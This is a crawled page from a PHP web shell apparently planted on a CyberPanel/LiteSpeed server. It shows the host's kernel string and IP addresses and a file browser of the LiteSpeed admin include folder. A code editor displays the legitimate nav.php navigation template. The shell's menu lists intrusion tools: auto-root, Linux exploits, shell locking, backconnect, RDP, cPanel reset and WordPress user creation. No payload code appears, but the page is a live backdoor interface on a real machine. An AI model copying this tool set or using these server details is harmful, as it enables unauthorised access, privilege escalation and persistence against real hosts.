Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.open /
view /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
auth.php
62
B
-rw-r--r--
configui.php
4.11
KB
-rw-r--r--
global.php
1.06
KB
-rw-r--r--
header.php
5.21
KB
-rw-r--r--
nav.php
3.62
KB
-rw-r--r--
scripts.php
3.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nav.php
<!-- Left panel : Navigation area --> <aside id="left-panel"> <!-- User info --> <div class="login-info"> <span> <!-- User image size is adjusted inside CSS, it should stay as is --> <a href="javascript:void(0);" id="show-shortcut" data-action="toggleShortcut"> <object type="image/svg+xml" data="/res/img/lsws_bolt.svg" alt="server"></object> <span><?php echo php_uname('n');?> </span> <i class="fa fa-angle-down"></i> </a> </span> </div> <!-- end user info --> <!-- NAVIGATION : This navigation is also responsive To make this navigation dynamic please make sure to link the node (the reference to the nav > ul) after page load. Or the navigation will not initialize. --> <nav> <!-- NOTE: Notice the gaps after each icon usage <i></i>.. Please note that these links work a bit different than traditional hre="" links. See documentation for details. --> <ul> <?php foreach ($page_nav as $key => $nav_item) { //process parent nav $nav_htm = ''; $url = isset($nav_item['url']) ? $nav_item['url'] : "#"; $url_target = ''; if (isset($nav_item['url_target'])) { $url_target = 'target="'.$nav_item['url_target'].'"' ; if ($nav_item['url_target'] == '_blank') $url_target .= ' rel="noopener noreferrer"'; } $icon_badge = isset($nav_item['icon_badge']) ? '<em>'.$nav_item['icon_badge'].'</em>' : ''; $icon = isset($nav_item['icon']) ? '<i class="fa fa-lg fa-fw '.$nav_item['icon'].'">'.$icon_badge.'</i>' : ""; $nav_title = isset($nav_item["title"]) ? $nav_item["title"] : "(No Name)"; $label_htm = isset($nav_item["label_htm"]) ? $nav_item["label_htm"] : ""; $nav_htm .= '<a href="'.$url.'" '.$url_target.' title="'.$nav_title.'">'.$icon.' <span class="menu-item-parent">'.$nav_title.'</span>'.$label_htm.'</a>'; if (isset($nav_item['sub']) && $nav_item['sub']) $nav_htm .= process_sub_nav($nav_item['sub']); echo '<li '.(isset($nav_item['active']) ? 'class = "active"' : '').'>'.$nav_htm.'</li>'; } function process_sub_nav($nav_item) { $sub_item_htm = ''; if (isset($nav_item['sub']) && $nav_item['sub']) { $sub_nav_item = $nav_item['sub']; $sub_item_htm = process_sub_nav($sub_nav_item); } else { $sub_item_htm .= '<ul>'; foreach ($nav_item as $key => $sub_item) { $url = isset($sub_item['url']) ? $sub_item['url'] : "#"; $url_target = ''; if (isset($sub_item['url_target'])) { $url_target = 'target="'.$sub_item['url_target'].'"' ; if ($sub_item['url_target'] == '_blank') $url_target .= ' rel="noopener noreferrer"'; } $icon = isset($sub_item['icon']) ? '<i class="fa fa-lg fa-fw '.$sub_item['icon'].'"></i>' : ""; $nav_title = isset($sub_item['title']) ? $sub_item['title'] : "(No Name)"; $label_htm = isset($sub_item['label_htm']) ? $sub_item['label_htm'] : ""; $sub_item_htm .= '<li '.(isset($sub_item['active']) ? 'class = "active"' : '').'> <a href="'.$url.'" '.$url_target.'>'.$icon.' '.$nav_title.$label_htm.'</a> '.(isset($sub_item['sub']) ? process_sub_nav($sub_item['sub']) : '').' </li>'; } $sub_item_htm .= '</ul>'; } return $sub_item_htm; } ?> </ul> </nav> <span class="minifyme" data-action="minifyMenu"> <i class="fa fa-arrow-circle-left hit"></i> </span> </aside> <!-- END NAVIGATION -->
Close